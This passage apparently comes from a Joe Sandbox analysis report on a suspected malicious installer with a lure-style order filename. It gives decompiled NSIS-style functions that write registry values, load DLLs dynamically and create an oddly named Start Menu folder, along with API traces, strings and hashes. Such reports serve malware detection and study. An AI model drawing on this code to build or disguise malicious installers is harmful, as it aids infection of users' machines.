					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}

0x00403149
0x00403156
0x00403169
0x0040316e
0x0040329e
0x004032a0
0x00000000
0x004032a6
0x0040317a
0x0040318d
0x00403193
0x00403199
0x004031a4
0x004031a4
0x004031a9
0x004031ae
0x004031b6
0x004031b8
0x004031b8
0x004031c1
0x004031c8
0x00000000
0x00000000
0x004031ce
0x004031d4
0x004031da
0x00000000
0x004031e0
0x004031e6
0x004031f0
0x00403206
0x0040320b
0x00403210
0x00403216
0x0040321c
0x00403226
0x0040322d
0x00000000
0x00000000
0x0040322f
0x00403235
0x00403237
0x0040325a
0x00403260
0x00000000
0x00000000
0x00403262
0x00403264
0x00000000
0x00000000
0x00403266
0x00403266
0x00403279
0x00000000
0x00000000
0x00403288
0x00000000
0x00403288
0x00403241
0x00403248
0x00403295
0x0040329b
0x0040329b
0x00000000
0x0040329b
0x0040324a
0x00403250
0x00403256
0x00000000
0x00000000
0x00000000
0x00403299
0x00403299
0x00000000
0x00403299
0x00000000

APIs

GetTickCount.KERNEL32 ref: 0040315A

Part of subcall function 004032C5: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FC3,?), ref: 004032D3

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403070,00000004,00000000,00000000,?,?,00402FEA,000000FF,00000000,00000000,0040A130,?), ref: 0040318D
SetFilePointer.KERNELBASE(000058EA,00000000,00000000,004138D8,00004000,?,00000000,00403070,00000004,00000000,00000000,?,?,00402FEA,000000FF,00000000), ref: 00403288

Strings

"numeric": "408", "official_name": "Democratic People's Republic of Korea" }, { "alpha_2": "PT", "alpha_3": "PRT", "name": "Portugal", "numeric": "620", "official_name": "Portuguese Republic" }, { "alph, xrefs: 0040319F, 0040323A

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: FilePointer$CountTick
String ID: "numeric": "408", "official_name": "Democratic People's Republic of Korea" }, { "alpha_2": "PT", "alpha_3": "PRT", "name": "Portugal", "numeric": "620", "official_name": "Portuguese Republic" }, { "alph
API String ID: 1092082344-208995783
Opcode ID: 66296152afd6068201e6c2e1ab460adb435358711bd3d40a2675aec94dc3ea3b
Instruction ID: 532adb213c64d5ab3b143d976f528210e7f95c922d5c949e36f01b9cb200fd6d
Opcode Fuzzy Hash: 66296152afd6068201e6c2e1ab460adb435358711bd3d40a2675aec94dc3ea3b
Instruction Fuzzy Hash: FD3160726442049FD710AF6AFE4896A3BECF75435A710827FE904B22F0DB389941DB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00401C04 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401C04(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				CHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t61;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402A9F(3);
				 *((intOrPtr*)(_t64 - 0x3c)) = _t57;
				 *(_t64 - 8) = _t29;
				_t30 = E00402A9F(4);
				 *((intOrPtr*)(_t64 - 0x3c)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402AC1(0x33);
				}
				__eflags =  *(_t64 - 0x14) & 0x00000002;
				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402AC1(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t59 = E00402AC1();
					_t32 = E00402AC1();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t59;
					__eflags = _t35;
					_t36 = FindWindowExA( *(_t64 - 8),  *(_t64 + 8), _t35,  ~( *_t32) & _t32); // executed
					goto L10;
				} else {
					_t61 = E00402A9F();
					 *((intOrPtr*)(_t64 - 0x3c)) = _t57;
					_t41 = E00402A9F(2);
					 *((intOrPtr*)(_t64 - 0x3c)) = _t57;
					_t56 =  *(_t64 - 0x14) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8));
						L10:
						 *(_t64 - 0xc) = _t36;
					} else {
						_t42 = SendMessageTimeoutA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8), _t46, _t56, _t64 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
					_push( *(_t64 - 0xc));
					E00405FF7();
				}
				 *0x4247c8 =  *0x4247c8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}

0x00401c04
0x00401c06
0x00401c0d
0x00401c10
0x00401c13
0x00401c1d
0x00401c21
0x00401c24
0x00401c2d
0x00401c2d
0x00401c30
0x00401c34
0x00401c3d
0x00401c3d
0x00401c40
0x00401c44
0x00401c46
0x00401c9b
0x00401c9d
0x00401ca6
0x00401cae
0x00401cb1
0x00401cb1
0x00401cba
0x00000000
0x00401c48
0x00401c4f
0x00401c51
0x00401c54
0x00401c5a
0x00401c61
0x00401c64
0x00401c8c
0x00401cc0
0x00401cc0
0x00401c66
0x00401c74
0x00401c7c
0x00401c7f
0x00401c7f
0x00401c64
0x00401cc3
0x00401cc6
0x00401ccc
0x004028f9
0x004028f9
0x00402954
0x00402960

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C74
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C8C

Strings

!, xrefs: 00401C40

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 61d668203e925d2b626f83b6d528d825a590e8d0b5f9acd222ce781ec0ff5e12
Instruction ID: aed907c05dc833253b389eb1df77c6bfbb772c9e61476b09ce63ef5510084725
Opcode Fuzzy Hash: 61d668203e925d2b626f83b6d528d825a590e8d0b5f9acd222ce781ec0ff5e12
Instruction Fuzzy Hash: 46218F71A44209AEEB15DFA5D946AED7BB0EF84304F14803EF505F61D1DA7889408F28

Uniqueness

Uniqueness Score: -1.00%

Function 004023D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E004023D0(void* __eax, int __ebx, intOrPtr __edx) {
				void* _t18;
				void* _t19;
				int _t22;
				long _t23;
				char _t25;
				int _t28;
				void* _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t35;
				void* _t37;
				void* _t40;

				_t31 = __edx;
				_t28 = __ebx;
				_t35 =  *((intOrPtr*)(_t37 - 0x18));
				_t32 = __eax;
				 *(_t37 - 0x3c) =  *(_t37 - 0x14);
				 *(_t37 - 0x34) = E00402AC1(2);
				_t18 = E00402AC1(0x11);
				 *(_t37 - 4) = 1;
				_t19 = E00402B51(_t40, _t32, _t18, 2); // executed
				 *(_t37 + 8) = _t19;
				if(_t19 != __ebx) {
					_t22 = 0;
					if(_t35 == 1) {
						E00402AC1(0x23);
						_t22 = lstrlenA(0x40ac00) + 1;
					}
					if(_t35 == 4) {
						_t25 = E00402A9F(3);
						_pop(_t30);
						 *0x40ac00 = _t25;
						 *((intOrPtr*)(_t37 - 0x80)) = _t31;
						_t22 = _t35;
					}
					if(_t35 == 3) {
						_t22 = E0040303E(_t30,  *((intOrPtr*)(_t37 - 0x1c)), _t28, 0x40ac00, 0xc00);
					}
					_t23 = RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x34), _t28,  *(_t37 - 0x3c), 0x40ac00, _t22); // executed
					if(_t23 == 0) {
						 *(_t37 - 4) = _t28;
					}
					_push( *(_t37 + 8));
					RegCloseKey(); // executed
				}
				 *0x4247c8 =  *0x4247c8 +  *(_t37 - 4);
				return 0;
			}

0x004023d0
0x004023d0
0x004023d0
0x004023d3
0x004023da
0x004023e4
0x004023e7
0x004023f0
0x004023f7
0x004023fe
0x00402401
0x00402407
0x00402411
0x00402415
0x00402420
0x00402420
0x00402424
0x00402428
0x0040242d
0x0040242e
0x00402434
0x00402437
0x00402437
0x0040243b
0x00402447
0x00402447
0x00402458
0x00402460
0x00402462
0x00402462
0x00402465
0x0040253c
0x0040253c
0x00402954
0x00402960

APIs

lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp,00000023,00000011,00000002), ref: 0040241B
RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp,00000000,00000011,00000002), ref: 00402458
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp,00000000,00000011,00000002), ref: 0040253C

Strings

C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp, xrefs: 0040240C, 0040241A, 0040242E, 00402442, 0040244D

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp
API String ID: 2655323295-1012084975
Opcode ID: 21db2f8f9692a3377bee1ea49589b4a1eede1b4b6c2deebe6580fb317b003819
Instruction ID: f5012b3eed6b0e10d725da1925ea8f3c2a7a7eca851d842cc00ee1163223ef4a
Opcode Fuzzy Hash: 21db2f8f9692a3377bee1ea49589b4a1eede1b4b6c2deebe6580fb317b003819
Instruction Fuzzy Hash: DA115471E00215BEDF10EFA5DE89A9E7A74EB44754F21403BF508F71D1CAB84D419B29

Uniqueness

Uniqueness Score: -1.00%

Function 00401FFD Relevance: 6.1, APIs: 4, Instructions: 73
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E00401FFD(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x4247f8");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x4247c8 =  *0x4247c8 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402AC1(0xfffffff0);
				 *(_t34 + 8) = E00402AC1(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E004051C0(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x425000, 0x40b804, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E00403889(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}

0x00401ffd
0x00401ffd
0x00402002
0x00402009
0x004020c4
0x00402237
0x00402237
0x00402951
0x00402954
0x00402960
0x00402960
0x00402018
0x00402022
0x00402025
0x00402034
0x00402038
0x0040203e
0x00402042
0x004020bd
0x00000000
0x004020bd
0x00402044
0x0040204d
0x00402051
0x00402095
0x00402053
0x00402056
0x00402059
0x00402089
0x0040205b
0x0040205e
0x00402067
0x00402069
0x00402069
0x00402067
0x00402059
0x0040209d
0x004020b2
0x004020b2
0x00000000
0x0040209d
0x00402028
0x0040202e
0x00402032
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00402028

Part of subcall function 004051C0: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D70,00000000,?), ref: 004051F9
Part of subcall function 004051C0: lstrlenA.KERNEL32(00402D70,Skipped: C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D70,00000000), ref: 00405209
Part of subcall function 004051C0: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp\System.dll,00402D70,00402D70,Skipped: C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp\System.dll,00000000,00000000,00000000), ref: 0040521C
Part of subcall function 004051C0: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp\System.dll), ref: 0040522E
Part of subcall function 004051C0: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405254
Part of subcall function 004051C0: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040526E
Part of subcall function 004051C0: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040527C

LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402038
GetProcAddress.KERNEL32(00000000,?), ref: 00402048
FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 004020B2

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID:
API String ID: 2987980305-0
Opcode ID: 4694ba33f5e8bacfeb5e3fcbfa85d02b4c6a72b11824bb7564f9b9a864f919fc
Instruction ID: b9fd2243ea981f5bcf097e6c9410b7191d7035710d5254353367cb498e194193
Opcode Fuzzy Hash: 4694ba33f5e8bacfeb5e3fcbfa85d02b4c6a72b11824bb7564f9b9a864f919fc
Instruction Fuzzy Hash: 2C21C971A04225A7CF207FA48E4DB6E7660AB44358F21413BF711B62D0CBBD4942965E

Uniqueness

Uniqueness Score: -1.00%

Function 004015BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E004015BB(char __ebx, void* __eflags) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402AC1(0xfffffff0);
				_t13 = E00405ACA(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E00405A5C(_t30, 0x5c);
						_t21 =  *_t32;
						 *_t32 = _t26;
						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E00405703(_t28);
						} else {
							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E00405720(_t39) == 0) {
								goto L5;
							} else {
								_t22 = E00405686(_t28); // executed
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00406099("C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Sigtelinjens\\Tvtningerne\\Tilegnelserne\\Suppegrydernes79", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x4247c8 =  *0x4247c8 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}

0x004015bb
0x004015c2
0x004015c5
0x004015ca
0x004015ce
0x004015d0
0x004015d8
0x004015da
0x004015dc
0x004015e0
0x004015e3
0x004015fb
0x004015fc
0x004015e5
0x004015e5
0x004015e8
0x00000000
0x004015f3
0x004015f4
0x004015f4
0x004015e8
0x00401603
0x0040160a
0x00401617
0x00401617
0x0040160c
0x0040160d
0x00401615
0x00000000
0x00000000
0x00401615
0x0040160a
0x0040161a
0x0040161d
0x0040161f
0x00401620
0x004015d0
0x00401627
0x00401652
0x00402237
0x00401629
0x0040162b
0x00401636
0x0040163c
0x00401644
0x0040164a
0x0040164a
0x00401644
0x00402954
0x00402960

APIs

Part of subcall function 00405ACA: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp,?,00405B36,C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp,C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp,77313410,?,77312EE0,00405881,?,77313410,77312EE0,00000000), ref: 00405AD8
Part of subcall function 00405ACA: CharNextA.USER32(00000000), ref: 00405ADD
Part of subcall function 00405ACA: CharNextA.USER32(00000000), ref: 00405AF1

GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D

Part of subcall function 00405686: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004056C9

SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Sigtelinjens\Tvtningerne\Tilegnelserne\Suppegrydernes79,00000000,00000000,000000F0), ref: 0040163C

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Sigtelinjens\Tvtningerne\Tilegnelserne\Suppegrydernes79, xrefs: 00401631

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Sigtelinjens\Tvtningerne\Tilegnelserne\Suppegrydernes79
API String ID: 1892508949-2270803269
Opcode ID: a1a99da81ec8ebe60bd9a559002f25b092f8fa51d43cb1406a9a8f8e6d1f3ea0
Instruction ID: e80d591928eb94818456189605928617e464058bd7b4ab9a9bc67e70efbf424e
Opcode Fuzzy Hash: a1a99da81ec8ebe60bd9a559002f25b092f8fa51d43cb1406a9a8f8e6d1f3ea0
Instruction Fuzzy Hash: D3112731208151EBCF217BB54D415BF26B0DA92324B28093FE9D1B22E2D63D4D436A3F

Uniqueness

Uniqueness Score: -1.00%

Function 00405B1F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00405B1F(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				void* _t22;

				E00406099(0x422138, _a4);
				_t21 = E00405ACA(0x422138);
				if(_t21 != 0) {
					E00406303(_t21);
					if(( *0x42473c & 0x00000080) == 0) {
						L5:
						_t22 = _t21 - 0x422138;
						while(1) {
							_t11 = lstrlenA(0x422138);
							_push(0x422138);
							if(_t11 <= _t22) {
								break;
							}
							_t12 = E0040639C();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405A78(0x422138);
								continue;
							} else {
								goto L1;
							}
						}
						E00405A31();
						_t16 = GetFileAttributesA(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}

0x00405b2b
0x00405b36
0x00405b3a
0x00405b41
0x00405b4d
0x00405b59
0x00405b59
0x00405b71
0x00405b72
0x00405b79
0x00405b7a
0x00000000
0x00000000
0x00405b5d
0x00405b64
0x00405b6c
0x00000000
0x00000000
0x00000000
0x00000000
0x00405b64
0x00405b7c
0x00405b82
0x00000000
0x00405b90
0x00405b4f
0x00405b53
0x00000000
0x00000000
0x00000000
0x00000000
0x00405b53
0x00405b3c
0x00000000

APIs

Part of subcall function 00406099: lstrcpynA.KERNEL32(?,?,00000400,004033DF,00423F20,NSIS Error,?,00000006,00000008,0000000A), ref: 004060A6

Part of subcall function 00405ACA: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp,?,00405B36,C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp,C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp,77313410,?,77312EE0,00405881,?,77313410,77312EE0,00000000), ref: 00405AD8
Part of subcall function 00405ACA: CharNextA.USER32(00000000), ref: 00405ADD
Part of subcall function 00405ACA: CharNextA.USER32(00000000), ref: 00405AF1

lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp,C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp,77313410,?,77312EE0,00405881,?,77313410,77312EE0,00000000), ref: 00405B72
GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp,C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp,C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp,C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp,C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp,C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp,C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp,77313410,?,77312EE0,00405881,?,77313410,77312EE0), ref: 00405B82

Strings

C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp, xrefs: 00405B25, 00405B2A, 00405B30, 00405B6B, 00405B71, 00405B79, 00405B81

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp
API String ID: 3248276644-1012084975
Opcode ID: c6667372e5261f6f491ce2a3369269f5050a05521b0262897edc27dc6412bb0c
Instruction ID: f7918bca05de5a67ada1f7886cb37670742315f8bcd1f0c25b92126024abb592
Opcode Fuzzy Hash: c6667372e5261f6f491ce2a3369269f5050a05521b0262897edc27dc6412bb0c
Instruction Fuzzy Hash: 5DF0F425205E6516C722323A0C45AAF6964CE92324709423BF891B22C3CA3CB8429DBD

Uniqueness

Uniqueness Score: -1.00%

Function 00405F80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00405F80(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x400;
				_t21 = E00405F1F(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExA(_a20, _a12, 0,  &_a8, _t30,  &_v8); // executed
					_t21 = RegCloseKey(_a20); // executed
					_t30[0x3ff] = _t30[0x3ff] & 0x00000000;
